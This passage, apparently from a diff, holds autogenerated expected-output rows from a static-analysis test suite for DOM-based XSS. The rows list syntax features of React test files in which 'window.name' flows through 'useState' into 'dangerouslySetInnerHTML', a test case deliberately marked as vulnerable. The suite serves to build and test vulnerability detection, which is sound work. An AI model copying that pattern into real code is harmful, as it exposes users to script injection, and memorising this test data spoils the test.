autogenerated/Xss/DomBasedXss/react-use-context.js:16:26:16:36 | window.name | enclosingFunctionName | foo | | autogenerated/Xss/DomBasedXss/react-use-context.js:16:26:16:36 | window.name | fileImports | ./react-create-context react | | autogenerated/Xss/DomBasedXss/react-use-context.js:16:26:16:36 | window.name | receiverName | root | +| autogenerated/Xss/DomBasedXss/react-use-context.js:16:33:16:36 | name | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:16:33:16:36 | name | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-context.js:16:33:16:36 | name | enclosingFunctionBody | root context root appendChild window name | +| autogenerated/Xss/DomBasedXss/react-use-context.js:16:33:16:36 | name | enclosingFunctionName | foo | +| autogenerated/Xss/DomBasedXss/react-use-context.js:16:33:16:36 | name | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:20:1:20:1 | C | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:20:1:20:1 | C | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:20:1:20:1 | C | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:20:1:20:13 | C.contextType | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:20:1:20:13 | C.contextType | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:20:1:20:13 | C.contextType | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:20:1:20:25 | C.conte ... Context | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:20:1:20:25 | C.conte ... Context | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:20:1:20:25 | C.conte ... Context | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:20:3:20:13 | contextType | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:20:3:20:13 | contextType | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:20:3:20:13 | contextType | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-context.js:20:17:20:25 | MyContext | assignedToPropName | contextType | +| autogenerated/Xss/DomBasedXss/react-use-context.js:20:17:20:25 | MyContext | contextFunctionInterfaces | constructor(args)\nfoo()\nuseDoc1()\nuseMyContext() | +| autogenerated/Xss/DomBasedXss/react-use-context.js:20:17:20:25 | MyContext | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-context.js:20:17:20:25 | MyContext | fileImports | ./react-create-context react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:1:1:1:0 | this | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:1:1:1:0 | this | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:1:1:1:1 | useState | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:1:1:1:1 | useState | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:1:1:1:1 | useState | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:1:1:1:33 | import ... react'; | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:1:1:1:33 | import ... react'; | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:1:1:1:33 | import ... react'; | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:1:10:1:17 | useState | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:1:10:1:17 | useState | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:1:10:1:17 | useState | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:1:10:1:17 | useState | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:1:10:1:17 | useState | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:1:10:1:17 | useState | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:1:10:1:17 | useState | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:1:10:1:17 | useState | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:1:10:1:17 | useState | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:1:10:1:17 | useState | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:1:10:1:17 | useState | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:1:10:1:17 | useState | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:1:10:1:17 | useState | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:1:26:1:32 | 'react' | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:1:26:1:32 | 'react' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:1:26:1:32 | 'react' | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:3:1:3:0 | this | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:3:1:3:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:3:1:3:0 | this | enclosingFunctionBody | state setState useState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:3:1:3:0 | this | enclosingFunctionName | initialState | +| autogenerated/Xss/DomBasedXss/react-use-state.js:3:1:3:0 | this | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:3:1:3:0 | useState | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:3:1:3:0 | useState | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:3:1:3:0 | useState | enclosingFunctionBody | state setState useState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:3:1:3:0 | useState | enclosingFunctionName | initialState | +| autogenerated/Xss/DomBasedXss/react-use-state.js:3:1:3:0 | useState | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:3:1:6:1 | 'arguments' object of function initialState | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:3:1:6:1 | 'arguments' object of function initialState | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:3:1:6:1 | 'arguments' object of function initialState | enclosingFunctionBody | state setState useState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:3:1:6:1 | 'arguments' object of function initialState | enclosingFunctionName | initialState | +| autogenerated/Xss/DomBasedXss/react-use-state.js:3:1:6:1 | 'arguments' object of function initialState | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:3:1:6:1 | exceptional return of function initialState | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:3:1:6:1 | exceptional return of function initialState | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:3:1:6:1 | exceptional return of function initialState | enclosingFunctionBody | state setState useState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:3:1:6:1 | exceptional return of function initialState | enclosingFunctionName | initialState | +| autogenerated/Xss/DomBasedXss/react-use-state.js:3:1:6:1 | exceptional return of function initialState | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:3:1:6:1 | functio ... OT OK\\n} | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:3:1:6:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:3:1:6:1 | functio ... OT OK\\n} | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:3:1:6:1 | return of function initialState | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:3:1:6:1 | return of function initialState | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:3:1:6:1 | return of function initialState | enclosingFunctionBody | state setState useState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:3:1:6:1 | return of function initialState | enclosingFunctionName | initialState | +| autogenerated/Xss/DomBasedXss/react-use-state.js:3:1:6:1 | return of function initialState | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:3:10:3:21 | initialState | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:3:10:3:21 | initialState | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:3:10:3:21 | initialState | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:4:9:4:25 | [state, setState] | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:4:9:4:25 | [state, setState] | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:4:9:4:25 | [state, setState] | enclosingFunctionBody | state setState useState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:4:9:4:25 | [state, setState] | enclosingFunctionName | initialState | +| autogenerated/Xss/DomBasedXss/react-use-state.js:4:9:4:25 | [state, setState] | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:4:9:4:49 | [state, ... w.name) | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:4:9:4:49 | [state, ... w.name) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:4:9:4:49 | [state, ... w.name) | enclosingFunctionBody | state setState useState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:4:9:4:49 | [state, ... w.name) | enclosingFunctionName | initialState | +| autogenerated/Xss/DomBasedXss/react-use-state.js:4:9:4:49 | [state, ... w.name) | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:4:9:4:49 | state | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:4:9:4:49 | state | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:4:9:4:49 | state | enclosingFunctionBody | state setState useState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:4:9:4:49 | state | enclosingFunctionName | initialState | +| autogenerated/Xss/DomBasedXss/react-use-state.js:4:9:4:49 | state | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:4:10:4:14 | state | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:4:10:4:14 | state | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:4:10:4:14 | state | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:4:10:4:14 | state | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:4:10:4:14 | state | enclosingFunctionBody | state setState useState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:4:10:4:14 | state | enclosingFunctionBody | state setState useState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:4:10:4:14 | state | enclosingFunctionName | initialState | +| autogenerated/Xss/DomBasedXss/react-use-state.js:4:10:4:14 | state | enclosingFunctionName | initialState | +| autogenerated/Xss/DomBasedXss/react-use-state.js:4:10:4:14 | state | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:4:10:4:14 | state | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:4:17:4:24 | setState | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:4:17:4:24 | setState | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:4:17:4:24 | setState | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:4:17:4:24 | setState | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:4:17:4:24 | setState | enclosingFunctionBody | state setState useState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:4:17:4:24 | setState | enclosingFunctionBody | state setState useState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:4:17:4:24 | setState | enclosingFunctionName | initialState | +| autogenerated/Xss/DomBasedXss/react-use-state.js:4:17:4:24 | setState | enclosingFunctionName | initialState | +| autogenerated/Xss/DomBasedXss/react-use-state.js:4:17:4:24 | setState | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:4:17:4:24 | setState | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:4:29:4:36 | useState | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:4:29:4:36 | useState | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:4:29:4:36 | useState | enclosingFunctionBody | state setState useState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:4:29:4:36 | useState | enclosingFunctionName | initialState | +| autogenerated/Xss/DomBasedXss/react-use-state.js:4:29:4:36 | useState | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:4:29:4:49 | exceptional return of useStat ... w.name) | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:4:29:4:49 | exceptional return of useStat ... w.name) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:4:29:4:49 | exceptional return of useStat ... w.name) | enclosingFunctionBody | state setState useState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:4:29:4:49 | exceptional return of useStat ... w.name) | enclosingFunctionName | initialState | +| autogenerated/Xss/DomBasedXss/react-use-state.js:4:29:4:49 | exceptional return of useStat ... w.name) | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:4:29:4:49 | useStat ... w.name) | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:4:29:4:49 | useStat ... w.name) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:4:29:4:49 | useStat ... w.name) | enclosingFunctionBody | state setState useState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:4:29:4:49 | useStat ... w.name) | enclosingFunctionName | initialState | +| autogenerated/Xss/DomBasedXss/react-use-state.js:4:29:4:49 | useStat ... w.name) | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:4:38:4:43 | window | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:4:38:4:43 | window | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:4:38:4:43 | window | enclosingFunctionBody | state setState useState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:4:38:4:43 | window | enclosingFunctionName | initialState | +| autogenerated/Xss/DomBasedXss/react-use-state.js:4:38:4:43 | window | fileImports | react | | autogenerated/Xss/DomBasedXss/react-use-state.js:4:38:4:48 | window.name | CalleeFlexibleAccessPath | useState | | autogenerated/Xss/DomBasedXss/react-use-state.js:4:38:4:48 | window.name | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/react-use-state.js:4:38:4:48 | window.name | calleeImports | react | @@ -14628,18 +106559,149 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/react-use-state.js:4:38:4:48 | window.name | enclosingFunctionBody | state setState useState window name div dangerouslySetInnerHTML __html state | | autogenerated/Xss/DomBasedXss/react-use-state.js:4:38:4:48 | window.name | enclosingFunctionName | initialState | | autogenerated/Xss/DomBasedXss/react-use-state.js:4:38:4:48 | window.name | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:4:45:4:48 | name | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:4:45:4:48 | name | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:4:45:4:48 | name | enclosingFunctionBody | state setState useState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:4:45:4:48 | name | enclosingFunctionName | initialState | +| autogenerated/Xss/DomBasedXss/react-use-state.js:4:45:4:48 | name | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:5:12:5:64 |
    | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:5:12:5:64 |
    | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:5:12:5:64 |
    | enclosingFunctionBody | state setState useState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:5:12:5:64 |
    | enclosingFunctionName | initialState | +| autogenerated/Xss/DomBasedXss/react-use-state.js:5:12:5:64 |
    | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:5:13:5:15 | div | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:5:13:5:15 | div | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:5:13:5:15 | div | enclosingFunctionBody | state setState useState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:5:13:5:15 | div | enclosingFunctionName | initialState | +| autogenerated/Xss/DomBasedXss/react-use-state.js:5:13:5:15 | div | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:5:17:5:39 | dangero ... nerHTML | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:5:17:5:39 | dangero ... nerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:5:17:5:39 | dangero ... nerHTML | enclosingFunctionBody | state setState useState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:5:17:5:39 | dangero ... nerHTML | enclosingFunctionName | initialState | +| autogenerated/Xss/DomBasedXss/react-use-state.js:5:17:5:39 | dangero ... nerHTML | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:5:17:5:57 | dangero ... state}} | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:5:17:5:57 | dangero ... state}} | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:5:17:5:57 | dangero ... state}} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:5:17:5:57 | dangero ... state}} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:5:17:5:57 | dangero ... state}} | enclosingFunctionBody | state setState useState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:5:17:5:57 | dangero ... state}} | enclosingFunctionBody | state setState useState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:5:17:5:57 | dangero ... state}} | enclosingFunctionName | initialState | +| autogenerated/Xss/DomBasedXss/react-use-state.js:5:17:5:57 | dangero ... state}} | enclosingFunctionName | initialState | +| autogenerated/Xss/DomBasedXss/react-use-state.js:5:17:5:57 | dangero ... state}} | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:5:17:5:57 | dangero ... state}} | fileImports | react | | autogenerated/Xss/DomBasedXss/react-use-state.js:5:42:5:56 | {__html: state} | assignedToPropName | dangerouslySetInnerHTML | | autogenerated/Xss/DomBasedXss/react-use-state.js:5:42:5:56 | {__html: state} | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | | autogenerated/Xss/DomBasedXss/react-use-state.js:5:42:5:56 | {__html: state} | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/react-use-state.js:5:42:5:56 | {__html: state} | enclosingFunctionBody | state setState useState window name div dangerouslySetInnerHTML __html state | | autogenerated/Xss/DomBasedXss/react-use-state.js:5:42:5:56 | {__html: state} | enclosingFunctionName | initialState | | autogenerated/Xss/DomBasedXss/react-use-state.js:5:42:5:56 | {__html: state} | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:5:43:5:48 | __html | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:5:43:5:48 | __html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:5:43:5:48 | __html | enclosingFunctionBody | state setState useState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:5:43:5:48 | __html | enclosingFunctionName | initialState | +| autogenerated/Xss/DomBasedXss/react-use-state.js:5:43:5:48 | __html | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:5:43:5:55 | __html: state | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:5:43:5:55 | __html: state | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:5:43:5:55 | __html: state | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:5:43:5:55 | __html: state | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:5:43:5:55 | __html: state | enclosingFunctionBody | state setState useState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:5:43:5:55 | __html: state | enclosingFunctionBody | state setState useState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:5:43:5:55 | __html: state | enclosingFunctionName | initialState | +| autogenerated/Xss/DomBasedXss/react-use-state.js:5:43:5:55 | __html: state | enclosingFunctionName | initialState | +| autogenerated/Xss/DomBasedXss/react-use-state.js:5:43:5:55 | __html: state | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:5:43:5:55 | __html: state | fileImports | react | | autogenerated/Xss/DomBasedXss/react-use-state.js:5:51:5:55 | state | assignedToPropName | __html | | autogenerated/Xss/DomBasedXss/react-use-state.js:5:51:5:55 | state | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | | autogenerated/Xss/DomBasedXss/react-use-state.js:5:51:5:55 | state | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/react-use-state.js:5:51:5:55 | state | enclosingFunctionBody | state setState useState window name div dangerouslySetInnerHTML __html state | | autogenerated/Xss/DomBasedXss/react-use-state.js:5:51:5:55 | state | enclosingFunctionName | initialState | | autogenerated/Xss/DomBasedXss/react-use-state.js:5:51:5:55 | state | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:8:1:8:0 | this | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:8:1:8:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:8:1:8:0 | this | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:8:1:8:0 | this | enclosingFunctionName | setStateValue | +| autogenerated/Xss/DomBasedXss/react-use-state.js:8:1:8:0 | this | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:8:1:8:0 | useState | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:8:1:8:0 | useState | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:8:1:8:0 | useState | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:8:1:8:0 | useState | enclosingFunctionName | setStateValue | +| autogenerated/Xss/DomBasedXss/react-use-state.js:8:1:8:0 | useState | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:8:1:12:1 | 'arguments' object of function setStateValue | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:8:1:12:1 | 'arguments' object of function setStateValue | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:8:1:12:1 | 'arguments' object of function setStateValue | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:8:1:12:1 | 'arguments' object of function setStateValue | enclosingFunctionName | setStateValue | +| autogenerated/Xss/DomBasedXss/react-use-state.js:8:1:12:1 | 'arguments' object of function setStateValue | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:8:1:12:1 | exceptional return of function setStateValue | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:8:1:12:1 | exceptional return of function setStateValue | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:8:1:12:1 | exceptional return of function setStateValue | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:8:1:12:1 | exceptional return of function setStateValue | enclosingFunctionName | setStateValue | +| 